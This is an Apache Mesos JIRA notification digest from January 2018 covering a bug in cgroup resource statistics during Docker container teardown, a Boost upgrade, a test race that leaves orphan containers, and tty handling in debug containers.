{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced through test.cpp with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8480:
---
Attachment: test.cpp

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being torn down, it seems that Docker 
> or the operating system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced through test.cpp with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)
Chun-Hung Hsiao created MESOS-8480:
--

 Summary: Mesos returns high resource usage when killing a Docker 
task.
 Key: MESOS-8480
 URL: https://issues.apache.org/jira/browse/MESOS-8480
 Project: Mesos
  Issue Type: Bug
  Components: cgroups
Reporter: Chun-Hung Hsiao
Assignee: Chun-Hung Hsiao


The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being torn down, it seems that Docker or 
the operating system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced through test.cpp with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8479) Document agent SIGUSR1 behavior.

2018-01-23 Thread James Peach (JIRA)
James Peach created MESOS-8479:
--

 Summary: Document agent SIGUSR1 behavior.
 Key: MESOS-8479
 URL: https://issues.apache.org/jira/browse/MESOS-8479
 Project: Mesos
  Issue Type: Bug
  Components: agent, documentation
Reporter: James Peach


The agent enters shutdown when it receives {{SIGUSR1}}. We should document what 
this means, what the corresponding behavior is, and how operators are intended 
to use it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-3915:

Shepherd: Benjamin Bannier

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336296#comment-16336296
 ] 

Benjamin Bannier commented on MESOS-3915:
-

{noformat}
commit ce0905fcb31a10ade0962a89235fa90b01edf01a
Author: Benjamin Bannier 
Date:   Tue Jan 23 14:47:37 2018 +0100

Updated mesos-tidy setup for upgraded Boost version.

In a previous commit we updated the bundled Boost version. This patch
updates the mesos-tidy setup to make sure we build the correct bundled
Boost version when creating analysis prerequisites.

Review: https://reviews.apache.org/r/65215/

commit a01b4c272848702d5bd3dd899e610a5459c4e57c
Author: Benno Evers 
Date:   Tue Jan 23 14:47:32 2018 +0100

Removed duplicate block in configure.ac.

This block seems to have been copy/pasted from another place.

Review: https://reviews.apache.org/r/62445/

commit 469363d4322c7acda7fd10acbe8822f610af5a43
Author: Benno Evers 
Date:   Tue Jan 23 14:47:31 2018 +0100

Updated boost version.

Review: https://reviews.apache.org/r/62161/

commit cd2774efde5e55cc027721086af14fbc78688849
Author: Benno Evers 
Date:   Tue Jan 23 14:47:28 2018 +0100

Added UNREACHABLE() macro to __cxa_pure_virtual.

The function __cxa_pure_virtual must not return,
but newer versions of clang detect that the expansion
of the RAW_LOG() macro contains returning code paths
for arguments other than FATAL.

Review: https://reviews.apache.org/r/62444/

commit a892a2e80255291e6cd5cb3b0e90b9a029989c99
Author: Benno Evers 
Date:   Tue Jan 23 14:47:24 2018 +0100

Fixed stout build with newer boost versions.

Starting from Boost 1.62, Boost.Variant added additional
compile-time checks to its constructors to fix this
issue: https://svn.boost.org/trac10/ticket/11602

However, this breaks some places in stout which try
to access a derived class from a variant holding the
base class.

Review: https://reviews.apache.org/r/62160/
{noformat}

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-3915) Upgrade vendored Boost

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-3915?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier reassigned MESOS-3915:
---

   Resolution: Fixed
 Assignee: Benno Evers
Fix Version/s: 1.6.0

Closing this one as we have moved the bundled Boost to 1.65.0 after fixing 
issues preventing such an upgrade.

> Upgrade vendored Boost
> --
>
> Key: MESOS-3915
> URL: https://issues.apache.org/jira/browse/MESOS-3915
> Project: Mesos
>  Issue Type: Bug
>Reporter: Neil Conway
>Assignee: Benno Evers
>Priority: Minor
>  Labels: boost, mesosphere, tech-debt
> Fix For: 1.6.0
>
>
> We should upgrade the vendored version of Boost to a newer version. Benefits:
> * -Should properly fix MESOS-688-
> * -Should fix MESOS-3799-
> * Generally speaking, using a more modern version of Boost means we can take 
> advantage of bug fixes, optimizations, and new features.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272
 ] 

Andrei Budnik edited comment on MESOS-7506 at 1/23/18 7:20 PM:
---

While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a Mesos containerizer leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point where we try to create a ["test" 
container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].
 As a result, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So there is a race between the recovery process for the first slave and the 
attempt to create a containerizer for the second agent.
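
To make the timing window concrete, here is a minimal, hypothetical sketch (it 
is not the actual `cgroups::prepare` or launcher recovery code; the path and 
names are illustrative): a probe cgroup is created and then removed, and any 
recovery scan that runs between the two steps will see a cgroup that matches 
no checkpointed container and classify it as an orphan.
{code}
#include <sys/stat.h>
#include <unistd.h>

#include <cerrno>
#include <cstring>
#include <iostream>
#include <string>

int main()
{
  // Illustrative path: a probe cgroup under the freezer hierarchy, similar in
  // spirit to the "test" container mentioned above.
  const std::string probe = "/sys/fs/cgroup/freezer/mesos_probe";

  // Step 1: create the probe cgroup to verify the hierarchy is usable.
  if (::mkdir(probe.c_str(), 0755) != 0 && errno != EEXIST) {
    std::cerr << "mkdir failed: " << ::strerror(errno) << std::endl;
    return 1;
  }

  // <-- Race window: a recovery scan of the hierarchy running here sees
  //     'mesos_probe', finds no checkpointed container for it, and treats it
  //     as an orphan to be destroyed.

  // Step 2: remove the probe cgroup again.
  if (::rmdir(probe.c_str()) != 0) {
    std::cerr << "rmdir failed: " << ::strerror(errno) << std::endl;
    return 1;
  }

  return 0;
}
{code}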


was (Author: abudnik):
While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a mesos c'zer, leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point, where we try to create a ["test" 
container|[https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].]
 So, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So, there is the race between recovery process for the first slave and an 
attempt to create a c'zer for the second agent.

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7506) Multiple tests leave orphan containers.

2018-01-23 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7506?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336272#comment-16336272
 ] 

Andrei Budnik commented on MESOS-7506:
--

While recovery is in progress for [the first 
slave|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L733],
 calling 
[`StartSlave()`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/containerizer/linux_capabilities_isolator_tests.cpp#L738]
 leads to calling 
[slave::Containerizer::create()|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/tests/cluster.cpp#L431]
 to create a containerizer. An attempt to create a Mesos containerizer leads to 
calling 
[`cgroups::prepare`|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L124].
 Finally, we get to the point where we try to create a ["test" 
container|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/linux/cgroups.cpp#L476].
 As a result, the recovery process for the first slave [might 
detect|https://github.com/apache/mesos/blob/ce0905fcb31a10ade0962a89235fa90b01edf01a/src/slave/containerizer/mesos/linux_launcher.cpp#L268-L301]
 this "test" container as an orphaned container.

So there is a race between the recovery process for the first slave and the 
attempt to create a containerizer for the second agent.

> Multiple tests leave orphan containers.
> ---
>
> Key: MESOS-7506
> URL: https://issues.apache.org/jira/browse/MESOS-7506
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 16.04
> Fedora 23
> other Linux distros
>Reporter: Alexander Rukletsov
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: containerizer, flaky-test, mesosphere
> Attachments: KillMultipleTasks-badrun.txt, 
> ROOT_IsolatorFlags-badrun.txt, ROOT_IsolatorFlags-badrun2.txt, 
> ROOT_IsolatorFlags-badrun3.txt, ReconcileTasksMissingFromSlave-badrun.txt, 
> ResourceLimitation-badrun.txt, ResourceLimitation-badrun2.txt, 
> RestartSlaveRequireExecutorAuthentication-badrun.txt, 
> TaskWithFileURI-badrun.txt
>
>
> I've observed a number of flaky tests that leave orphan containers upon 
> cleanup. A typical log looks like this:
> {noformat}
> ../../src/tests/cluster.cpp:580: Failure
> Value of: containers->empty()
>   Actual: false
> Expected: true
> Failed to destroy containers: { da3e8aa8-98e7-4e72-a8fd-5d0bae960014 }
> {noformat}
> All currently affected tests:
> {noformat}
> SlaveTest.RestartSlaveRequireExecutorAuthentication // cannot reproduce any 
> more
> ROOT_IsolatorFlags
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336247#comment-16336247
 ] 

Vinod Kone commented on MESOS-6804:
---

Making this an improvement because tty applications work properly. The only 
issue is if someone types `tty` after attaching.

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Major
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6804:
--
Priority: Major  (was: Critical)

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Major
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6804) Running 'tty' inside a debug container that has a tty reports "Not a tty"

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-6804:
--
Issue Type: Improvement  (was: Bug)

> Running 'tty' inside a debug container that has a tty reports "Not a tty"
> -
>
> Key: MESOS-6804
> URL: https://issues.apache.org/jira/browse/MESOS-6804
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Kevin Klues
>Priority: Critical
>  Labels: debugging, mesosphere
>
> We need to inject `/dev/console` into the container and map it to the slave 
> end of the TTY we are attached to.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-7966) check for maintenance on agent causes fatal error

2018-01-23 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-7966?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone updated MESOS-7966:
--
Sprint: Mesosphere Sprint 66, Mesosphere Sprint 74  (was: Mesosphere Sprint 
66)

> check for maintenance on agent causes fatal error
> -
>
> Key: MESOS-7966
> URL: https://issues.apache.org/jira/browse/MESOS-7966
> Project: Mesos
